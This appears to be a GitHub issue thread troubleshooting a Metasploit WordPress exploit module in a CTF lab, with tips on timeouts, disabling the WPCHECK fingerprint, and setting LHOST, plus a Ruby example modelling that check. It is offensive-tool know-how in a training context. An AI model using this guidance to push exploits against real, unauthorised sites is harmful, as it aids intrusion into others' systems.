It appears your issue is different to the issues described above. The error message you have received relates to a timeout.

grepcoffee commented 2 years ago

Could also be a timeout issue. Try setting it like below.

set httpclienttimeout 60

d914e3ecf6cc481114a3f534a5faf90b commented 1 year ago

Recently ran into this issue, here are my findings.

If you are seeing `Exploit aborted due to failure: not-found: The target does not appear to be using WordPress`, then please: `set wpcheck false`

If you are seeing `Exploit aborted due to failure: unexpected-reply: Failed to upload the payload`, then please: `set httpclienttimeout 300`

Lastly, please confirm that the IP you're using for LHOST is correct. For instance, if you're working the CTF through TryHackMe then please use your VPN IP.

bcoles commented 1 year ago

> If you are seeing `Exploit aborted due to failure: not-found: The target does not appear to be using WordPress`, then please: `set wp-check false`

The option is called WPCHECK rather than wp-check.

set WPCHECK false

https://github.com/rapid7/metasploit-framework/blob/0436e8bad998d035e6558ebcbb2e878eaf898ce6/lib/msf/core/exploit/remote/http/wordpress.rb#L33
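
As an added example (not Metasploit's code; the marker patterns and function names are assumptions chosen for illustration), a simplified model of the gate the WPCHECK option controls: the module fingerprints the front page for WordPress markers before logging in, so a genuine WordPress install that hides those markers (generator tag stripped, assets served from a CDN) still produces "not-found", and `set WPCHECK false` skips the fingerprint entirely.

```ruby
# Added example, not the Metasploit mixin. The real check lives in
# lib/msf/core/exploit/remote/http/wordpress.rb; these patterns are assumptions.

# Markers a stock WordPress front page normally exposes. A hardened site that
# strips the generator tag and serves assets elsewhere may match none of them,
# which is how a real WordPress target can still trip "not-found".
WP_MARKERS = [
  %r{/wp-content/}i,
  %r{/wp-includes/}i,
  /<meta\s+name=["']generator["']\s+content=["']WordPress[^"']*["']/i,
  %r{<link[^>]+rel=["']https://api\.w\.org/["']}i
].freeze

# Returns the first marker pattern that matched the response body, or nil.
def wordpress_fingerprint(body)
  WP_MARKERS.find { |re| re.match?(body.to_s) }
end

# Models the decision taken before authentication:
#   :ok        -> proceed
#   :not_found -> abort with "The target does not appear to be using WordPress"
# With wpcheck = false the fingerprint is skipped, so the module proceeds even
# when the body matches nothing (including a target that is not WordPress).
def wp_check(body, wpcheck: true)
  return :ok unless wpcheck
  wordpress_fingerprint(body) ? :ok : :not_found
end

# Constructed sample responses (not captured traffic).
STOCK_SITE = <<~HTML
  <html><head>
  <meta name="generator" content="WordPress 4.3.1" />
  <link rel="stylesheet" href="http://wp.example.test/wp-content/themes/x/style.css" />
  </head><body>user's Blog!</body></html>
HTML

HARDENED_SITE = <<~HTML
  <html><head>
  <link rel="stylesheet" href="https://cdn.example.test/assets/style.css" />
  </head><body>user's Blog!</body></html>
HTML

if $PROGRAM_NAME == __FILE__
  puts "stock site:                 #{wp_check(STOCK_SITE)}"                    # ok
  puts "hardened site:              #{wp_check(HARDENED_SITE)}"                 # not_found
  puts "hardened site, WPCHECK off: #{wp_check(HARDENED_SITE, wpcheck: false)}" # ok
end
```

Skipping the check removes a safety stop, not the upload itself: a non-WordPress target will then fail later with a different error, so treat `not-found` as a fingerprinting question before disabling it.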

secsalem commented 1 year ago

I think there are sessions or something in the background that may trigger this; it may need further research, but a quick solution that comes to mind:

Restart VM or restart target machines